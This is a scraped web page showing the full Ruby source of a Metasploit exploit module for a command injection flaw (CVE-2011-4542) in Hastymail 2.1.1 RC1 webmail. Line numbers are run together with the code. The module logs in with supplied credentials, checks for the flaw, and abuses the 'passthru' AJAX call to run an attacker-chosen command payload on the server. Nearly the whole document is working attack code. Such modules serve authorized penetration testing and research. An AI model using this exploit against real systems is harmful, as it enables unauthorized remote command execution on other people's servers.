Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/webapp/hastymail_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info={})11super(update_info(info,12'Name' => "Hastymail 2.1.1 RC1 Command Injection",13'Description' => %q{14This module exploits a command injection vulnerability found in Hastymail152.1.1 RC1 due to the insecure usage of the call_user_func_array() function on16the "lib/ajax_functions.php" script. Authentication is required on Hastymail17in order to exploit the vulnerability. The module has been successfully tested18on Hastymail 2.1.1 RC1 over Ubuntu 10.04.19},20'License' => MSF_LICENSE,21'Author' =>22[23'Bruno Teixeira', # Vulnerability Discovery24'juan vazquez' # Metasploit module25],26'References' =>27[28[ 'CVE', '2011-4542' ],29[ 'BID', '50791' ],30[ 'OSVDB', '77331' ],31[ 'URL', 'https://www.dognaedis.com/vulns/DGS-SEC-3.html' ]32],33'Payload' =>34{35'Compat' =>36{37'PayloadType' => 'cmd',38'RequiredCmd' => 'generic perl ruby python netcat netcat-e',39}40},41'Platform' => ['unix'],42'Arch' => ARCH_CMD,43'Targets' =>44[45['Hastymail 2.1.1 RC1', {}]46],47'Privileged' => false,48'DisclosureDate' => '2011-11-22',49'DefaultTarget' => 0))5051register_options(52[53OptString.new('TARGETURI', [true, "The base path to Hastymail", "/hastymail2/"]),54OptString.new('USER', [true, "The username to authenticate with", ""]),55OptString.new('PASS', [true, "The password to authenticate with", ""])56])57end585960def check61@uri = normalize_uri(target_uri.path)62@uri << '/' if @uri[-1,1] != '/'63@session_id = ""6465login6667if not @session_id or @session_id.empty?68vprint_error "Authentication failed"69return Exploit::CheckCode::Unknown70end7172test = rand_text_alpha(rand(4) + 4)73data = "rs=passthru&"74data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"75data << "rsargs[]=echo #{test}"76res = send_request_cgi({77'method' => 'POST',78'uri' => "#{@uri}",79'Cookie' => @session_id,80'data' => data81})8283if res and res.code == 200 and res.body =~ /#{test}/84return Exploit::CheckCode::Vulnerable85else86return Exploit::CheckCode::Safe87end88end8990def login91res = send_request_cgi({92'method' => 'POST',93'uri' => "#{@uri}?page=login",94'vars_post' =>95{96'user' => datastore['USER'],97'pass' => datastore['PASS'],98'login' => 'Login'99}100})101102if res and res.code == 303103@session_id = res.get_cookies104print_good("Authentication Successful")105end106end107108def exploit109@uri = normalize_uri(target_uri.path)110@uri << '/' if @uri[-1,1] != '/'111@session_id = ""112113print_status "Trying login"114login115116if not @session_id or @session_id.empty?117print_error "Authentication failed"118return119end120121print_good "Authentication successfully, trying to exploit"122123data = "rs=passthru&"124data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"125data << "rsargs[]=#{payload.encoded}"126127res = send_request_cgi({128'method' => 'POST',129'uri' => "#{@uri}",130'Cookie' => @session_id,131'headers' => {132'Cmd' => Rex::Text.encode_base64(payload.encoded)133},134'data' => data135})136137if not res or res.code != 200 or not res.body =~ /\+/138print_error "Exploitation failed"139return140end141142end143144145end146147148